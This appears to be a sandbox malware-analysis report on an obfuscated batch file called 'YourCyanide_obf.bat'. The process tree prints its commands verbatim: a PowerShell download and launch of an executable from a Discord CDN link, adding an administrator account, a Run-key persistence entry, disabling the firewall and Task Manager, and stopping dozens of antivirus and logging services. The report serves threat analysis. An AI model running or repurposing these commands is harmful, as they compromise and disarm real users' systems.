e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751

Analysis

max time kernel
150s
max time network
48s
platform
windows7_x64
resource
win7-20220414-en
submitted
19/05/2022, 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide_obf.bat
Size

136KB
MD5

60105b0d25a609bbf93236f003064d2c
SHA1

bf5fae15e830e6793d2b5b60af0cbb92a4098663
SHA256

e8266fb4c02fdf3d4b449814100c4839a52ceeeeb175f816b357cb695b4b1751
SHA512

b6d4259a2e1eca153d39299d1cfa16b2f1b07eead78b1afc8b4ebd6af17805c6d1112c6ed82e362430b7d6bf180822a3c44e819593da724706499e4c04b7d89c

Score

10^/10

evasion persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1640	powershell.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
1656	NoKeyB.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Loads dropped DLL 1 IoCs

pid	Process
1036	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_7961_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide_obf.bat"	reg.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Confession.bat	cmd.exe
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe
File created	C:\Windows\Confession.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2692	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2232	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1500	taskkill.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%tmDUu:~17	cmd.exe
File opened for modification	C:\Users\Admin\%etozn:~1	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1752	powershell.exe
1752	powershell.exe
1640	powershell.exe
428	scrnsave.scr
968	scrnsave.scr
1620	scrnsave.scr
1488	scrnsave.scr

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	428	scrnsave.scr
Token: SeDebugPrivilege	968	scrnsave.scr
Token: SeDebugPrivilege	1620	scrnsave.scr
Token: SeDebugPrivilege	1488	scrnsave.scr

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1656	NoKeyB.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
1656	NoKeyB.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1656	NoKeyB.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1036 wrote to memory of 2016	1036	cmd.exe	29
PID 1036 wrote to memory of 2016	1036	cmd.exe	29
PID 1036 wrote to memory of 2016	1036	cmd.exe	29
PID 1036 wrote to memory of 1752	1036	cmd.exe	30
PID 1036 wrote to memory of 1752	1036	cmd.exe	30
PID 1036 wrote to memory of 1752	1036	cmd.exe	30
PID 1036 wrote to memory of 1108	1036	cmd.exe	31
PID 1036 wrote to memory of 1108	1036	cmd.exe	31
PID 1036 wrote to memory of 1108	1036	cmd.exe	31
PID 1108 wrote to memory of 632	1108	net.exe	32
PID 1108 wrote to memory of 632	1108	net.exe	32
PID 1108 wrote to memory of 632	1108	net.exe	32
PID 1036 wrote to memory of 1728	1036	cmd.exe	33
PID 1036 wrote to memory of 1728	1036	cmd.exe	33
PID 1036 wrote to memory of 1728	1036	cmd.exe	33
PID 1036 wrote to memory of 1848	1036	cmd.exe	34
PID 1036 wrote to memory of 1848	1036	cmd.exe	34
PID 1036 wrote to memory of 1848	1036	cmd.exe	34
PID 1036 wrote to memory of 1872	1036	cmd.exe	35
PID 1036 wrote to memory of 1872	1036	cmd.exe	35
PID 1036 wrote to memory of 1872	1036	cmd.exe	35
PID 1036 wrote to memory of 1640	1036	cmd.exe	36
PID 1036 wrote to memory of 1640	1036	cmd.exe	36
PID 1036 wrote to memory of 1640	1036	cmd.exe	36
PID 1036 wrote to memory of 1656	1036	cmd.exe	37
PID 1036 wrote to memory of 1656	1036	cmd.exe	37
PID 1036 wrote to memory of 1656	1036	cmd.exe	37
PID 1036 wrote to memory of 1616	1036	cmd.exe	38
PID 1036 wrote to memory of 1616	1036	cmd.exe	38
PID 1036 wrote to memory of 1616	1036	cmd.exe	38
PID 1616 wrote to memory of 1584	1616	net.exe	39
PID 1616 wrote to memory of 1584	1616	net.exe	39
PID 1616 wrote to memory of 1584	1616	net.exe	39
PID 1036 wrote to memory of 1244	1036	cmd.exe	40
PID 1036 wrote to memory of 1244	1036	cmd.exe	40
PID 1036 wrote to memory of 1244	1036	cmd.exe	40
PID 1244 wrote to memory of 888	1244	net.exe	41
PID 1244 wrote to memory of 888	1244	net.exe	41
PID 1244 wrote to memory of 888	1244	net.exe	41
PID 1036 wrote to memory of 1500	1036	cmd.exe	42
PID 1036 wrote to memory of 1500	1036	cmd.exe	42
PID 1036 wrote to memory of 1500	1036	cmd.exe	42
PID 1036 wrote to memory of 836	1036	cmd.exe	44
PID 1036 wrote to memory of 836	1036	cmd.exe	44
PID 1036 wrote to memory of 836	1036	cmd.exe	44
PID 836 wrote to memory of 952	836	net.exe	45
PID 836 wrote to memory of 952	836	net.exe	45
PID 836 wrote to memory of 952	836	net.exe	45
PID 1036 wrote to memory of 1984	1036	cmd.exe	46
PID 1036 wrote to memory of 1984	1036	cmd.exe	46
PID 1036 wrote to memory of 1984	1036	cmd.exe	46
PID 1984 wrote to memory of 1424	1984	net.exe	47
PID 1984 wrote to memory of 1424	1984	net.exe	47
PID 1984 wrote to memory of 1424	1984	net.exe	47
PID 1036 wrote to memory of 1356	1036	cmd.exe	48
PID 1036 wrote to memory of 1356	1036	cmd.exe	48
PID 1036 wrote to memory of 1356	1036	cmd.exe	48
PID 1036 wrote to memory of 1308	1036	cmd.exe	49
PID 1036 wrote to memory of 1308	1036	cmd.exe	49
PID 1036 wrote to memory of 1308	1036	cmd.exe	49
PID 1308 wrote to memory of 820	1308	net.exe	50
PID 1308 wrote to memory of 820	1308	net.exe	50
PID 1308 wrote to memory of 820	1308	net.exe	50
PID 1036 wrote to memory of 892	1036	cmd.exe	51

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\HideyHidey.vbs"
  2⤵
  PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1752
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:632
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7961_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide_obf.bat /f
  2⤵
  - Adds Run key to start application
  PID:1728
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:1848
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:1872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1640
- C:\Users\Admin\Documents\NoKeyB.exe
  NoKeyB.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1656
- C:\Windows\system32\net.exe
  net stop "wuauserv"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wuauserv"
    3⤵
    PID:1584
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRT /y
    3⤵
    PID:888
- C:\Windows\system32\taskkill.exe
  taskkill /f /t /im "MSASCui.exe"
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1500
- C:\Windows\system32\net.exe
  net stop "security center"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "security center"
    3⤵
    PID:952
- C:\Windows\system32\net.exe
  net stop sharedaccess
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sharedaccess
    3⤵
    PID:1424
- C:\Windows\system32\netsh.exe
  netsh firewall set opmode mode-disable
  2⤵
  PID:1356
- C:\Windows\system32\net.exe
  net stop "Security Center" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Security Center" /y
    3⤵
    PID:820
- C:\Windows\system32\net.exe
  net stop "Automatic Updates" /y
  2⤵
  PID:892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Automatic Updates" /y
    3⤵
    PID:1756
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:1368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:1632
- C:\Windows\system32\net.exe
  net stop "SAVScan" /y
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SAVScan" /y
    3⤵
    PID:1160
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Firewall Monitor Service" /y
  2⤵
  PID:268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
    3⤵
    PID:1776
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto-Protect Service" /y
  2⤵
  PID:428
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
    3⤵
    PID:1488
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1600
- C:\Windows\system32\net.exe
  net stop "McAfee Spamkiller Server" /y
  2⤵
  PID:632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
    3⤵
    PID:288
- C:\Windows\system32\net.exe
  net stop "McAfee Personal Firewall Service" /y
  2⤵
  PID:308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
    3⤵
    PID:624
- C:\Windows\system32\net.exe
  net stop "McAfee SecurityCenter Update Manager" /y
  2⤵
  PID:784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
    3⤵
    PID:1516
- C:\Windows\system32\net.exe
  net stop "Symantec SPBBCSvc" /y
  2⤵
  PID:1936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
    3⤵
    PID:1720
- C:\Windows\system32\net.exe
  net stop "Ahnlab Task Scheduler" /y
  2⤵
  PID:756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
    3⤵
    PID:2016
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:564
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1176
- C:\Windows\system32\net.exe
  net stop vrmonsvc /y
  2⤵
  PID:1412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vrmonsvc /y
    3⤵
    PID:1568
- C:\Windows\system32\net.exe
  net stop MonSvcNT /y
  2⤵
  PID:300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MonSvcNT /y
    3⤵
    PID:1584
- C:\Windows\system32\net.exe
  net stop SAVScan /y
  2⤵
  PID:1384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVScan /y
    3⤵
    PID:888
- C:\Windows\system32\net.exe
  net stop NProtectService /y
  2⤵
  PID:1788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NProtectService /y
    3⤵
    PID:1072
- C:\Windows\system32\net.exe
  net stop ccSetMGR /y
  2⤵
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMGR /y
    3⤵
    PID:948
- C:\Windows\system32\net.exe
  net stop ccEvtMGR /y
  2⤵
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMGR /y
    3⤵
    PID:1700
- C:\Windows\system32\net.exe
  net stop srservice /y
  2⤵
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop srservice /y
    3⤵
    PID:828
- C:\Windows\system32\net.exe
  net stop "Symantec Network Drivers Service" /y
  2⤵
  PID:1708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
    3⤵
    PID:1364
- C:\Windows\system32\net.exe
  net stop "norton Unerase Protection" /y
  2⤵
  PID:1268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton Unerase Protection" /y
    3⤵
    PID:820
- C:\Windows\system32\net.exe
  net stop MskService /y
  2⤵
  PID:1308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MskService /y
    3⤵
    PID:276
- C:\Windows\system32\net.exe
  net stop MpfService /y
  2⤵
  PID:1756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MpfService /y
    3⤵
    PID:892
- C:\Windows\system32\net.exe
  net stop mcupdmgr.exe /y
  2⤵
  PID:1704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mcupdmgr.exe /y
    3⤵
    PID:1632
- C:\Windows\system32\net.exe
  net stop "McAfeeAntiSpyware" /y
  2⤵
  PID:1368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
    3⤵
    PID:692
- C:\Windows\system32\net.exe
  net stop helpsvc /y
  2⤵
  PID:1160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop helpsvc /y
    3⤵
    PID:1992
- C:\Windows\system32\net.exe
  net stop ERSvc /y
  2⤵
  PID:1264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ERSvc /y
    3⤵
    PID:1776
- C:\Windows\system32\net.exe
  net stop "*norton*" /y
  2⤵
  PID:268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*norton*" /y
    3⤵
    PID:1752
- C:\Windows\system32\net.exe
  net stop "*Symantec*" /y
  2⤵
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*Symantec*" /y
    3⤵
    PID:428
- C:\Windows\system32\net.exe
  net stop "*McAfee*" /y
  2⤵
  PID:1604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "*McAfee*" /y
    3⤵
    PID:1600
- C:\Windows\system32\net.exe
  net stop ccPwdSvc /y
  2⤵
  PID:868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccPwdSvc /y
    3⤵
    PID:1728
- C:\Windows\system32\net.exe
  net stop "Symantec Core LC" /y
  2⤵
  PID:288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec Core LC" /y
    3⤵
    PID:632
- C:\Windows\system32\net.exe
  net stop navapsvc /y
  2⤵
  PID:1872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop navapsvc /y
    3⤵
    PID:624
- C:\Windows\system32\net.exe
  net stop "Serv-U" /y
  2⤵
  PID:308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Serv-U" /y
    3⤵
    PID:1068
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:784
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:1720
- C:\Windows\system32\net.exe
  net stop "Symantec AntiVirus Client" /y
  2⤵
  PID:1936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
    3⤵
    PID:1996
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Server" /y
  2⤵
  PID:2016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
    3⤵
    PID:756
- C:\Windows\system32\net.exe
  net stop "NAV Alert" /y
  2⤵
  PID:1112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NAV Alert" /y
    3⤵
    PID:564
- C:\Windows\system32\net.exe
  net stop "Nav Auto-Protect" /y
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
    3⤵
    PID:1512
- C:\Windows\system32\net.exe
  net stop "McShield" /y
  2⤵
  PID:1176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McShield" /y
    3⤵
    PID:380
- C:\Windows\system32\net.exe
  net stop "DefWatch" /y
  2⤵
  PID:556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "DefWatch" /y
    3⤵
    PID:1568
- C:\Windows\system32\net.exe
  net stop eventlog /y
  2⤵
  PID:1412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop eventlog /y
    3⤵
    PID:1616
- C:\Windows\system32\net.exe
  net stop InoRPC /y
  2⤵
  PID:1584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoRPC /y
    3⤵
    PID:300
- C:\Windows\system32\net.exe
  net stop InoRT /y
  2⤵
  PID:1244
- C:\Windows\system32\net.exe
  net stop InoTask /y
  2⤵
  PID:1384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop InoTask /y
    3⤵
    PID:1200
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Auto Protect Service" /y
  2⤵
  PID:1072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
    3⤵
    PID:1788
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Client" /y
  2⤵
  PID:952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
    3⤵
    PID:948
- C:\Windows\system32\net.exe
  net stop "norton AntiVirus Corporate Edition" /y
  2⤵
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
    3⤵
    PID:1424
- C:\Windows\system32\net.exe
  net stop "ViRobot Professional Monitoring" /y
  2⤵
  PID:1700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
    3⤵
    PID:1724
- C:\Windows\system32\net.exe
  net stop "PC-cillin Personal Firewall" /y
  2⤵
  PID:1324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
    3⤵
    PID:828
- C:\Windows\system32\net.exe
  net stop "Trend Micro Proxy Service" /y
  2⤵
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
    3⤵
    PID:1356
- C:\Windows\system32\net.exe
  net stop "Trend NT Realtime Service" /y
  2⤵
  PID:1364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
    3⤵
    PID:1708
- C:\Windows\system32\net.exe
  net stop "McAfee.com McShield" /y
  2⤵
  PID:1240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com McShield" /y
    3⤵
    PID:1732
- C:\Windows\system32\net.exe
  net stop "McAfee.com VirusScan Online Realtime Engine" /y
  2⤵
  PID:1928
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
    3⤵
    PID:1980
- C:\Windows\system32\net.exe
  net stop "SyGateService" /y
  2⤵
  PID:1756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SyGateService" /y
    3⤵
    PID:1632
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1576
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus" /y
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
    3⤵
    PID:1104
- C:\Windows\system32\net.exe
  net stop "Sophos Anti-Virus Network" /y
  2⤵
  PID:684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
    3⤵
    PID:1968
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Job Server" /y
  2⤵
  PID:520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
    3⤵
    PID:976
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus Realtime Server" /y
  2⤵
  PID:956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
    3⤵
    PID:1736
- C:\Windows\system32\net.exe
  net stop "Sygate Personal Firewall Pro" /y
  2⤵
  PID:1664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
    3⤵
    PID:1740
- C:\Windows\system32\net.exe
  net stop "eTrust Antivirus RPC Server" /y
  2⤵
  PID:1108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
    3⤵
    PID:1848
- C:\Windows\system32\net.exe
  net stop netsvcs
  2⤵
  PID:1168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop netsvcs
    3⤵
    PID:108
- C:\Windows\system32\net.exe
  net stop spoolnt
  2⤵
  PID:1800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop spoolnt
    3⤵
    PID:1808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
  2⤵
  PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
  2⤵
  PID:540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  PID:1528
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1648
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1700
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1368
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1800
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:820
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:632
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2136
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2184
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2596
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2692
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2732
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2860
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2976
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2068
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2144
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2156
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1200
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1756
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2412
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2676
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2600
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2712
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2836
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2832
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2956
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2796
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3040
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2392
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2460
